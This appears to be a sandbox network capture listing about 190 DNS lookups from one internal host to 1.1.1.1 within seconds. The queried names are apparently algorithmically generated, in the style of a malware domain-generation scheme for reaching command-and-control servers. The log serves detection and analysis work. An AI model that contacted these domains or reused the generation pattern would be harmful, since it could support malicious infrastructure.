Aug 23, 2024 18:43:31.752306938 CEST	192.168.2.5	1.1.1.1	0xc243	Standard query (0)	puzyceg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752332926 CEST	192.168.2.5	1.1.1.1	0x2960	Standard query (0)	qeqyniq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752474070 CEST	192.168.2.5	1.1.1.1	0xbff7	Standard query (0)	vowymom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752587080 CEST	192.168.2.5	1.1.1.1	0x707a	Standard query (0)	lyxysad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752692938 CEST	192.168.2.5	1.1.1.1	0xb4eb	Standard query (0)	vofykyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752824068 CEST	192.168.2.5	1.1.1.1	0xd8be	Standard query (0)	puzypav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752971888 CEST	192.168.2.5	1.1.1.1	0x29e	Standard query (0)	volypof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753060102 CEST	192.168.2.5	1.1.1.1	0xe8ca	Standard query (0)	lymynuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753226042 CEST	192.168.2.5	1.1.1.1	0xb74a	Standard query (0)	qedykep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753349066 CEST	192.168.2.5	1.1.1.1	0x7197	Standard query (0)	pumybuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753489017 CEST	192.168.2.5	1.1.1.1	0x3ab	Standard query (0)	galypob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753622055 CEST	192.168.2.5	1.1.1.1	0x4a6	Standard query (0)	vonybuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753699064 CEST	192.168.2.5	1.1.1.1	0x768f	Standard query (0)	lysyjex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753859997 CEST	192.168.2.5	1.1.1.1	0x10dc	Standard query (0)	pupyjap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.753870964 CEST	192.168.2.5	1.1.1.1	0xe724	Standard query (0)	qekytig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754095078 CEST	192.168.2.5	1.1.1.1	0x96d8	Standard query (0)	lykytin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754154921 CEST	192.168.2.5	1.1.1.1	0x34a3	Standard query (0)	ganyvyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754288912 CEST	192.168.2.5	1.1.1.1	0xe86f	Standard query (0)	vopyjac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754451036 CEST	192.168.2.5	1.1.1.1	0x35c8	Standard query (0)	pujytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754467010 CEST	192.168.2.5	1.1.1.1	0x132b	Standard query (0)	qebyvyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754676104 CEST	192.168.2.5	1.1.1.1	0x29d5	Standard query (0)	gatyhos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754829884 CEST	192.168.2.5	1.1.1.1	0xe99d	Standard query (0)	lyvyver.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755072117 CEST	192.168.2.5	1.1.1.1	0xd17a	Standard query (0)	vojyrum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755230904 CEST	192.168.2.5	1.1.1.1	0x46c2	Standard query (0)	gadykyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755290985 CEST	192.168.2.5	1.1.1.1	0x6253	Standard query (0)	qetyhov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.934847116 CEST	192.168.2.5	1.1.1.1	0x388b	Standard query (0)	puvycel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.935561895 CEST	192.168.2.5	1.1.1.1	0xa962	Standard query (0)	gahyruh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.936101913 CEST	192.168.2.5	1.1.1.1	0x2ab4	Standard query (0)	lyrygid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.936780930 CEST	192.168.2.5	1.1.1.1	0xd9c3	Standard query (0)	vocycat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.937267065 CEST	192.168.2.5	1.1.1.1	0xf9b	Standard query (0)	qegyryq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.937382936 CEST	192.168.2.5	1.1.1.1	0x512c	Standard query (0)	purygiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.937863111 CEST	192.168.2.5	1.1.1.1	0xee15	Standard query (0)	gacycaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.938318014 CEST	192.168.2.5	1.1.1.1	0x1f7d	Standard query (0)	lygywyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.938318014 CEST	192.168.2.5	1.1.1.1	0xbc8e	Standard query (0)	vowyguf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.938827991 CEST	192.168.2.5	1.1.1.1	0xbf55	Standard query (0)	pufyweq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.938864946 CEST	192.168.2.5	1.1.1.1	0x4eb3	Standard query (0)	qexyxop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.939306974 CEST	192.168.2.5	1.1.1.1	0x2309	Standard query (0)	gaqyfub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.939640045 CEST	192.168.2.5	1.1.1.1	0x7626	Standard query (0)	lyxyxox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.939865112 CEST	192.168.2.5	1.1.1.1	0x1219	Standard query (0)	qeqyfug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.940121889 CEST	192.168.2.5	1.1.1.1	0x5602	Standard query (0)	vofyqek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.940556049 CEST	192.168.2.5	1.1.1.1	0xa7fc	Standard query (0)	gadyqaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.940820932 CEST	192.168.2.5	1.1.1.1	0xb6df	Standard query (0)	puzyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.940946102 CEST	192.168.2.5	1.1.1.1	0xafaa	Standard query (0)	lymyfyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.941260099 CEST	192.168.2.5	1.1.1.1	0x2d0c	Standard query (0)	volyzic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.941639900 CEST	192.168.2.5	1.1.1.1	0x761c	Standard query (0)	pumydyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.941673994 CEST	192.168.2.5	1.1.1.1	0xe524	Standard query (0)	qedyqal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.942081928 CEST	192.168.2.5	1.1.1.1	0xa3ba	Standard query (0)	galyzus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.942392111 CEST	192.168.2.5	1.1.1.1	0xb8d0	Standard query (0)	lysymor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.942679882 CEST	192.168.2.5	1.1.1.1	0x6b90	Standard query (0)	vonydem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.942679882 CEST	192.168.2.5	1.1.1.1	0x7eed	Standard query (0)	qekyluv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.943223000 CEST	192.168.2.5	1.1.1.1	0x42be	Standard query (0)	ganydeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.943245888 CEST	192.168.2.5	1.1.1.1	0xfa7e	Standard query (0)	pupymol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.943645000 CEST	192.168.2.5	1.1.1.1	0xfa96	Standard query (0)	lykylud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.943645000 CEST	192.168.2.5	1.1.1.1	0x703f	Standard query (0)	vopymit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.944205046 CEST	192.168.2.5	1.1.1.1	0xc7c	Standard query (0)	gatyniz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.944380045 CEST	192.168.2.5	1.1.1.1	0xd0b0	Standard query (0)	pujylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.944380045 CEST	192.168.2.5	1.1.1.1	0x62be	Standard query (0)	qebysaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.945054054 CEST	192.168.2.5	1.1.1.1	0xf422	Standard query (0)	vojykyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.945117950 CEST	192.168.2.5	1.1.1.1	0x9245	Standard query (0)	lyvysaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.945554018 CEST	192.168.2.5	1.1.1.1	0xf422	Standard query (0)	qetynup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.945854902 CEST	192.168.2.5	1.1.1.1	0x6f96	Standard query (0)	puvypoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.946079016 CEST	192.168.2.5	1.1.1.1	0x9382	Standard query (0)	gahykeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.946535110 CEST	192.168.2.5	1.1.1.1	0x82d1	Standard query (0)	vocypok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.946667910 CEST	192.168.2.5	1.1.1.1	0x4a20	Standard query (0)	lyrynux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.947077036 CEST	192.168.2.5	1.1.1.1	0xb9ed	Standard query (0)	qegykeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.947423935 CEST	192.168.2.5	1.1.1.1	0x5188	Standard query (0)	purybup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.947674036 CEST	192.168.2.5	1.1.1.1	0xb464	Standard query (0)	gacypiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.947848082 CEST	192.168.2.5	1.1.1.1	0x99ee	Standard query (0)	lygyjan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.948338032 CEST	192.168.2.5	1.1.1.1	0xd15d	Standard query (0)	vowybyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.948550940 CEST	192.168.2.5	1.1.1.1	0x2f8c	Standard query (0)	qexytil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.948905945 CEST	192.168.2.5	1.1.1.1	0x909	Standard query (0)	pufyjag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949296951 CEST	192.168.2.5	1.1.1.1	0xe559	Standard query (0)	gaqyvys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949628115 CEST	192.168.2.5	1.1.1.1	0x9d18	Standard query (0)	lyxytur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949661016 CEST	192.168.2.5	1.1.1.1	0x78ff	Standard query (0)	vofyjom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.950139046 CEST	192.168.2.5	1.1.1.1	0xa9e4	Standard query (0)	qeqyvev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.951442957 CEST	192.168.2.5	1.1.1.1	0xf245	Standard query (0)	puzytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.952728987 CEST	192.168.2.5	1.1.1.1	0x196c	Standard query (0)	qedyhiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.952804089 CEST	192.168.2.5	1.1.1.1	0x521f	Standard query (0)	lymyved.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.952894926 CEST	192.168.2.5	1.1.1.1	0x5132	Standard query (0)	volyrut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953203917 CEST	192.168.2.5	1.1.1.1	0x34a6	Standard query (0)	pumycav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953308105 CEST	192.168.2.5	1.1.1.1	0xfb2c	Standard query (0)	lysygij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953432083 CEST	192.168.2.5	1.1.1.1	0x2f11	Standard query (0)	vonycaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953502893 CEST	192.168.2.5	1.1.1.1	0x7dd5	Standard query (0)	qekyryp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953653097 CEST	192.168.2.5	1.1.1.1	0x193d	Standard query (0)	galyryz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953802109 CEST	192.168.2.5	1.1.1.1	0x7ad3	Standard query (0)	pupyguq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953830004 CEST	192.168.2.5	1.1.1.1	0x156b	Standard query (0)	gadyhoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.953963995 CEST	192.168.2.5	1.1.1.1	0x5f68	Standard query (0)	lykywex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.954020977 CEST	192.168.2.5	1.1.1.1	0x26c3	Standard query (0)	ganycob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.954183102 CEST	192.168.2.5	1.1.1.1	0xb0a5	Standard query (0)	vopyguk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.512087107 CEST	192.168.2.5	1.1.1.1	0x370f	Standard query (0)	qebyxog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.512088060 CEST	192.168.2.5	1.1.1.1	0xd3d7	Standard query (0)	pujywep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.512742043 CEST	192.168.2.5	1.1.1.1	0x163f	Standard query (0)	gatyfuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.513360023 CEST	192.168.2.5	1.1.1.1	0xdbf5	Standard query (0)	vojyqac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.513360023 CEST	192.168.2.5	1.1.1.1	0x14d9	Standard query (0)	qetyfyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.513894081 CEST	192.168.2.5	1.1.1.1	0x2ead	Standard query (0)	puvyxig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.514146090 CEST	192.168.2.5	1.1.1.1	0xc4ae	Standard query (0)	lyvyxin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.514575958 CEST	192.168.2.5	1.1.1.1	0x26ef	Standard query (0)	gahyqas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.514642000 CEST	192.168.2.5	1.1.1.1	0xa43d	Standard query (0)	vocyzum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.514766932 CEST	192.168.2.5	1.1.1.1	0xff9f	Standard query (0)	lyryfyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.515295982 CEST	192.168.2.5	1.1.1.1	0x5729	Standard query (0)	qegyqov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.515295982 CEST	192.168.2.5	1.1.1.1	0xac42	Standard query (0)	purydel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.515770912 CEST	192.168.2.5	1.1.1.1	0x503c	Standard query (0)	gacyzuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.516011953 CEST	192.168.2.5	1.1.1.1	0x6d68	Standard query (0)	vowydet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.516011953 CEST	192.168.2.5	1.1.1.1	0xac91	Standard query (0)	lygymod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.516577005 CEST	192.168.2.5	1.1.1.1	0x5ab6	Standard query (0)	qexyluq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.516957998 CEST	192.168.2.5	1.1.1.1	0xed3a	Standard query (0)	pufymiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.517399073 CEST	192.168.2.5	1.1.1.1	0x6091	Standard query (0)	gaqydaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.518029928 CEST	192.168.2.5	1.1.1.1	0x2e2a	Standard query (0)	lyxylyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.518757105 CEST	192.168.2.5	1.1.1.1	0xcbca	Standard query (0)	vofymif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.519401073 CEST	192.168.2.5	1.1.1.1	0xc656	Standard query (0)	qeqysap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.520026922 CEST	192.168.2.5	1.1.1.1	0xe811	Standard query (0)	puzylyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.520622969 CEST	192.168.2.5	1.1.1.1	0x5555	Standard query (0)	gadynub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.521173954 CEST	192.168.2.5	1.1.1.1	0x418a	Standard query (0)	lymysox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.521954060 CEST	192.168.2.5	1.1.1.1	0xe43e	Standard query (0)	volykek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.522598982 CEST	192.168.2.5	1.1.1.1	0x7678	Standard query (0)	qedynug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.523875952 CEST	192.168.2.5	1.1.1.1	0x28dc	Standard query (0)	pumypop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.524312973 CEST	192.168.2.5	1.1.1.1	0x6914	Standard query (0)	galykew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.529666901 CEST	192.168.2.5	1.1.1.1	0x3904	Standard query (0)	vonypic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.529666901 CEST	192.168.2.5	1.1.1.1	0x306e	Standard query (0)	lysynun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530155897 CEST	192.168.2.5	1.1.1.1	0xdb65	Standard query (0)	qekykal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530155897 CEST	192.168.2.5	1.1.1.1	0x98a5	Standard query (0)	pupybyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530368090 CEST	192.168.2.5	1.1.1.1	0x29aa	Standard query (0)	ganypis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530539989 CEST	192.168.2.5	1.1.1.1	0xa80b	Standard query (0)	lykyjar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530728102 CEST	192.168.2.5	1.1.1.1	0x9532	Standard query (0)	vopybym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.531352997 CEST	192.168.2.5	1.1.1.1	0x702d	Standard query (0)	qebytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.531584978 CEST	192.168.2.5	1.1.1.1	0xc747	Standard query (0)	pujyjol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.531903982 CEST	192.168.2.5	1.1.1.1	0x2f05	Standard query (0)	gatyveh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.532140970 CEST	192.168.2.5	1.1.1.1	0x4a0e	Standard query (0)	lyvytud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.532356977 CEST	192.168.2.5	1.1.1.1	0x41e1	Standard query (0)	vojyjot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.532792091 CEST	192.168.2.5	1.1.1.1	0x361a	Standard query (0)	qetyveq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.533258915 CEST	192.168.2.5	1.1.1.1	0xb69a	Standard query (0)	puvytuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.533663988 CEST	192.168.2.5	1.1.1.1	0x6326	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.533889055 CEST	192.168.2.5	1.1.1.1	0x9bb3	Standard query (0)	lyryvaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.534279108 CEST	192.168.2.5	1.1.1.1	0x8903	Standard query (0)	vocyryf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.534482002 CEST	192.168.2.5	1.1.1.1	0x35be	Standard query (0)	qegyhip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.534708977 CEST	192.168.2.5	1.1.1.1	0x2aef	Standard query (0)	purycaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.535052061 CEST	192.168.2.5	1.1.1.1	0x9f1d	Standard query (0)	gacyryb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.535295010 CEST	192.168.2.5	1.1.1.1	0x27a2	Standard query (0)	lygygux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.536390066 CEST	192.168.2.5	1.1.1.1	0xbe48	Standard query (0)	vowycok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.536633015 CEST	192.168.2.5	1.1.1.1	0x9211	Standard query (0)	qexyreg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.542574883 CEST	192.168.2.5	1.1.1.1	0xf5f7	Standard query (0)	pufygup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.543760061 CEST	192.168.2.5	1.1.1.1	0x58c1	Standard query (0)	gaqycow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.543957949 CEST	192.168.2.5	1.1.1.1	0x6c6b	Standard query (0)	lyxywen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.544258118 CEST	192.168.2.5	1.1.1.1	0xca47	Standard query (0)	vofyguc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.544442892 CEST	192.168.2.5	1.1.1.1	0x621d	Standard query (0)	qeqyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.544913054 CEST	192.168.2.5	1.1.1.1	0x378b	Standard query (0)	gadyfys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.544913054 CEST	192.168.2.5	1.1.1.1	0x9937	Standard query (0)	puzywag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545084953 CEST	192.168.2.5	1.1.1.1	0x496c	Standard query (0)	lymyxir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545237064 CEST	192.168.2.5	1.1.1.1	0x146	Standard query (0)	volyqam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545720100 CEST	192.168.2.5	1.1.1.1	0xf7ee	Standard query (0)	qedyfyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545720100 CEST	192.168.2.5	1.1.1.1	0x4be8	Standard query (0)	galyqoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545820951 CEST	192.168.2.5	1.1.1.1	0xcb44	Standard query (0)	pumyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545932055 CEST	192.168.2.5	1.1.1.1	0x5f76	Standard query (0)	lysyfed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.748999119 CEST	192.168.2.5	1.1.1.1	0x83ea	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.525532007 CEST	192.168.2.5	1.1.1.1	0xf7ab	Standard query (0)	vonyzut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.525532007 CEST	192.168.2.5	1.1.1.1	0xf4bc	Standard query (0)	qekyqoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.526129007 CEST	192.168.2.5	1.1.1.1	0xeba9	Standard query (0)	pupydev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.526165009 CEST	192.168.2.5	1.1.1.1	0xdf88	Standard query (0)	ganyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.526695013 CEST	192.168.2.5	1.1.1.1	0xb6cc	Standard query (0)	lykymij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.526770115 CEST	192.168.2.5	1.1.1.1	0xbcb4	Standard query (0)	vopydaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.527434111 CEST	192.168.2.5	1.1.1.1	0x667d	Standard query (0)	qebylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.528006077 CEST	192.168.2.5	1.1.1.1	0x4364	Standard query (0)	pujymiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.528265953 CEST	192.168.2.5	1.1.1.1	0x4af3	Standard query (0)	gatydab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.528378010 CEST	192.168.2.5	1.1.1.1	0xc5b6	Standard query (0)	lyvylyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.529031038 CEST	192.168.2.5	1.1.1.1	0xb320	Standard query (0)	vojymuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.529052019 CEST	192.168.2.5	1.1.1.1	0x5051	Standard query (0)	qetysog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.529628992 CEST	192.168.2.5	1.1.1.1	0xfe75	Standard query (0)	puvylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.530230999 CEST	192.168.2.5	1.1.1.1	0x856	Standard query (0)	gahynuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.530617952 CEST	192.168.2.5	1.1.1.1	0x313d	Standard query (0)	vocykec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.530909061 CEST	192.168.2.5	1.1.1.1	0x824	Standard query (0)	lyryson.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.531603098 CEST	192.168.2.5	1.1.1.1	0xa594	Standard query (0)	qegynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.532237053 CEST	192.168.2.5	1.1.1.1	0x50be	Standard query (0)	purypig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.534360886 CEST	192.168.2.5	1.1.1.1	0x745	Standard query (0)	gacykas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.535377026 CEST	192.168.2.5	1.1.1.1	0x4885	Standard query (0)	lygynyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.536557913 CEST	192.168.2.5	1.1.1.1	0xa661	Standard query (0)	vowypim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.537482977 CEST	192.168.2.5	1.1.1.1	0xb697	Standard query (0)	qexykav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.538773060 CEST	192.168.2.5	1.1.1.1	0x9da7	Standard query (0)	pufybyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.549762964 CEST	192.168.2.5	1.1.1.1	0x9eb2	Standard query (0)	gaqypuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.550070047 CEST	192.168.2.5	1.1.1.1	0x275a	Standard query (0)	lyxyjod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.550465107 CEST	192.168.2.5	1.1.1.1	0x707d	Standard query (0)	vofybet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.550937891 CEST	192.168.2.5	1.1.1.1	0xb17d	Standard query (0)	qeqytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.551861048 CEST	192.168.2.5	1.1.1.1	0x23f7	Standard query (0)	puzyjov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.558800936 CEST	192.168.2.5	1.1.1.1	0x5ae0	Standard query (0)	gadyvez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.559331894 CEST	192.168.2.5	1.1.1.1	0xae57	Standard query (0)	lymytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.559604883 CEST	192.168.2.5	1.1.1.1	0x1ca2	Standard query (0)	volyjif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.560400009 CEST	192.168.2.5	1.1.1.1	0xd1ef	Standard query (0)	qedyvap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.560812950 CEST	192.168.2.5	1.1.1.1	0x3011	Standard query (0)	pumytyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.561085939 CEST	192.168.2.5	1.1.1.1	0x1143	Standard query (0)	galyhib.com	A (IP address)	IN (0x0001)	false
